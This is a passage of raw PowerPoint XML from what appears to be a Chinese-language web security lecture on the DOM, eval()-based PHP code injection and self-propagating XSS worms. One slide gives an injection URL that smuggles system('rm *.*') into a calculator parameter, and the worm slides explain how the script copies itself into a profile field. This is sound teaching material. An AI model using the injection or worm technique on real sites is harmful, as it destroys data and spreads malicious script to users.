          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>将页面的内容组织成对象树（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>节点）。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DOM API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，我们可以访问树上的每个节点。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>如果一个页面包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>代码，它将作为一个对象存储在树中。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>所以，如果我们知道包含代码的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>节点，我们可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DOM API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>从节点获取代码。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>每个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>节点都可以被赋予一个名称，然后使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.getElementByID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>来查找该节点。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1335360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一般代码注入攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1524000"/>
            <a:ext cx="8229600" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击者的目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在服务器上执行任意代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>例子</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的代码注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   (PHP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>是一个把字符串当作表达式执行而返回一个结果的函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://site.com/calc.php        (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务端的计算器程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://site.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>calc.php?exp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=“ 10 ; system(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> *.*’) ”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6849208" y="6324600"/>
            <a:ext cx="1116011" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>(URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>编码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3086100" y="4152900"/>
            <a:ext cx="3505200" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $in = $_GET[‘exp']; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>('$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = ' . $in . ';'); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"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prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-69848">
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>自我传播的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0"/>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>蠕虫</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="217" name="Shape 217"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="650240" y="1458112"/>
            <a:ext cx="6746240" cy="2158393"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="218" name="Shape 218"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="377625" y="3717650"/>
            <a:ext cx="8520600" cy="2057400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457197" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" dirty="0" err="1"/>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" dirty="0"/>
              <a:t>(“worm”)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>来获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>节点的引用</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457197" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1"/>
              <a:t>innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>给出节点的内部部分，不包括</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>脚本标记，需要加上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>&lt;script id=“worm”&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>，以组成恶意脚本代码副本。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457197" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>最后，在攻击代码中，我们可以将消息与整个代码的副本一起放入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>description</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>字段中。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="直接连接符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25EF2981-C7F7-4A7C-B635-42EFD4BD7B2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4343400" y="2438400"/>
            <a:ext cx="533400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="lg" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="直接连接符 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11A01BAB-3153-4FC1-B944-9C013DA06C78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="1752600"/>
            <a:ext cx="533400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="lg" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13210627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prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-69848">
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>自我传播的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0"/>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>蠕虫</a:t>
            </a:r>
            <a:endParaRPr sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="224" name="Shape 224"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5862" y="1584960"/>
            <a:ext cx="5739474" cy="3230880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="225" name="Shape 225"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5745336" y="975167"/>
            <a:ext cx="3404526" cy="1290319"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" u="sng" dirty="0"/>
              <a:t>Line </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" u="sng" dirty="0">
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>①</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" u="sng" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" u="sng" dirty="0">
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>②</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" u="sng" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Construct a copy of the worm code, including the script tags.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Shape 237"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5745336" y="2121507"/>
            <a:ext cx="3636571" cy="3116209"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" u="sng" dirty="0"/>
              <a:t>Line </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" u="sng" dirty="0">
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>③</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" u="sng" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> In HTTP POST requests, data is sent with Content-Type as “application/x-www-form-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>urlencoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>”. We use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>encodeURIComponent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>() function to encode the string.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" u="sng" dirty="0"/>
              <a:t>Line </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" u="sng" dirty="0">
